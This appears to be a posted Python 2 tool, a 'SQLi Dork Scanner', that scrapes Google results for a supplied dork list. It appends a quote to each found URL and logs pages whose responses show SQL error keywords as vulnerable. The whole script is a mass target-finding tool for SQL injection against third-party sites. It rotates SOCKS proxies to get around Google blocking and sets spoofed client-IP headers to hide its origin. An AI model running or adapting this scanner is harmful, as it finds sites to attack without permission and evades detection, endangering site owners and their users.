SQLi Dork Scanner [FINAL RELEASE]

1. #!/usr/bin/python
2. #SQLi google dork scanner
3. #coded by Freak/SynthMesc
4. #Version 1.0.3
5. import sys,re,random,string,time,threading,os,socks
6. import socket
7. import urllib2,urllib
8. try:
9.     dorklist=sys.argv[1]
10.     proxylist=sys.argv[2]
11. except:
12.     print "Usage: " + sys.argv[0] + " [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
13.     exit(1)
14. def switchProxy():
15.     try:
16.         socket.backup
17.     except:
18.         socket.backup = socket.socket
19.     socket.socket = socket.backup
20.     proxyhost = random.choice(open(proxylist,"r").read().split("\n")).split(":")
21.     proxyport = int(proxyhost[1])
22.     proxyhost = proxyhost[0]
23.     socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, proxyhost, proxyport)
24.     socket.socket = socks.socksocket
25. def randomIP():
26.     return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
27. def test(url):
28.     try:
29.         opener = urllib2.build_opener()
30.         opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
31.         opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
32.         opener.addheaders = [('REMOTE-ADDR',randomIP())]
33.         opener.addheaders = [('VIA',randomIP())]
34.         opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
35.         keywords=["SQL", "Syntax", "Warning"]
36.         testchar="'"
37.         print "[+] Trying "+url+testchar
38.         try:
39.             resp=opener.open(url+testchar,timeout=5)
40.         except Exception, e:
41.             print "[-] "+str(e)
42.             return
43.         words = resp.read().split(" ")
44.         for keyword in keywords:
45.             try:
46.                 for x in words:
47.                     if keyword in x:
48.                         print "[+] Found keyword '"+keyword+"' at "+url+testchar
49.                         f=open("SQLi_Vulnerable.txt","a")
50.                         f.write(url+testchar+"\n")
51.                         f.close()
52.                         break
53.             except urllib2.HTTPError as e:
54.                 print "[-] "+str(e)
55.                 pass
56.     except urllib2.URLError as e:
57.         print "[-] "+str(e)
58.         pass
59. def spyder(dork,page):
60.     opener = urllib2.build_opener()
61.     opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
62.     opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
63.     opener.addheaders = [('REMOTE-ADDR',randomIP())]
64.     opener.addheaders = [('VIA',randomIP())]
65.     opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
66.     opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
67.     opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
68.     opener.addheaders = [('Accept-Encoding','gzip, deflate')]
69.     opener.addheaders = [('Referer',dork)]
70.     try:
71.         searchresults=opener.open(dork,timeout=5).read()
72.     except Exception, e:
73.         print "[-] "+str(e)
74.         print "[-] Bot has been blocked from google!!! Switching proxy!"
75.         switchProxy()
76.         spyder(dork, page)
77.     try:
78.         searchresults
79.     except NameError:
80. #       print "[-] Variable undefined, re-searching"
81.         try:
82.             searchresults=opener.open(dork,timeout=5).read()
83.         except:
84.             try:
85.                 searchresults=opener.open(dork,timeout=5).read()
86.             except:
87.                 print "[-] Bot has been blocked from google!!! Switching proxy!"
88.                 switchProxy()
89.                 spyder(dork, page)
90.     else:
91.         pass
92. #       print "[+] Variable defined, continuing search"
93.  
94.     for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
95.         i=i.replace("amp;",'')
96.         if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
97.             dorkurl="https://encrypted.google.com"+i
98.             print "[+] Searching next page "+dorkurl
99.             time.sleep(5)
100.             spyder(dorkurl,page)
101.             page+=1
102.         i=urllib2.unquote(i).decode('utf8')
103.         try:
104.             i=i.split("?q=")[1]
105.             i=i.split("&sa=")[0]
106.             if i.startswith("http"):
107.                     if i.startswith("http://accounts.google.com"):
108.                         continue
109.                     elif i.startswith("http://www.google.com"):
110.                         continue
111.                     elif i.startswith("http://encrypted.google.com"):
112.                         continue
113.                     elif i.startswith("http://webcache.googleusercontent.com"):
114.                         continue
115.                     elif i!=dork.decode('utf8'):
116.                         threading.Thread(target=test, args=(i,)).start()
117.         except:
118.             continue
119. f=open(dorklist,"r")
120. for dork in f.read().split("\n"):
121.     print "[+] Searching for dork: '"+dork+"'"
122.     spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
123. f.close()